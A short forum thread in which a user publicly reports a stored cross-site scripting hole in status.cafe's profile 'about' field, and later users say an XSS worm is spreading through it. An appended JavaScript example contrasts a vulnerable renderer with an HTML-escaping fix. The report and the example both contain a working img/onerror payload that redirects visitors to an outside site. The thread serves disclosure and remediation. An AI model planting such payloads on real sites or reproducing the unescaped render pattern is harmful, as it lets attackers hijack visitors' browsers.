Hello, your site is vulnerable to XSS from the profile about form.

Author Topic
div

Posted 2023-07-12 23:59:22

https://status.cafe/users/div

Observe.

I am sorry to inform you of this publicly. Feel free to delete this message.

<img src="x" onerror="window.location.href = 'https://divsel.neocities.org'" />

In the meantime, if you're a user who is interested in mitigating this problem, you can use NoScript Suite to mark JS from this domain as untrusted.

Last edited on 2023-07-13 00:17:44

hazel

Posted 2025-04-16 10:02:30

Bump! This still happens.

cyanide

Posted 2025-04-23 19:20:27

Yep, there's an XSS worm going around right now. I'm using the NoScript Suite for now to block it as suggested by div, but it also means that statuscafe widgets are disabled on external websites which is really annoying.
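
Added example, not part of any post in this thread and not status.cafe's own code: the server-side fix for the issue reported above is to HTML-encode the stored "about" text when it is rendered. The function names and the surrounding `<div>` markup are assumptions made for illustration.

```javascript
// Added example; function names and markup are hypothetical, not status.cafe's code.

// Characters that let text break out of an HTML text node or a quoted attribute.
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Encode untrusted text for an HTML body or quoted-attribute context.
function escapeHtml(value) {
  if (value === null || value === undefined) return '';
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// BEFORE: the stored "about" text is concatenated into the page as markup,
// so any tag or event-handler attribute a user saved is parsed by the browser.
function renderAboutVulnerable(about) {
  return '<div class="about">' + about + '</div>';
}

// AFTER: encode at output time, then add the only markup the page itself
// wants (line breaks). Escaping must come first, otherwise the <br> tags
// would be encoded too.
function renderAboutHardened(about) {
  const safe = escapeHtml(about).replace(/\r\n|\r|\n/g, '<br>');
  return '<div class="about">' + safe + '</div>';
}

// The string posted earlier in this thread, used as the sample input.
const SAMPLE_ABOUT =
  '<img src="x" onerror="window.location.href = \'https://divsel.neocities.org\'" />';

console.log(renderAboutVulnerable(SAMPLE_ABOUT)); // markup reaches the page intact
console.log(renderAboutHardened(SAMPLE_ABOUT));   // rendered as literal text
```

Encoding at render time also neutralises entries that were saved before the fix, which input-side filtering alone would not.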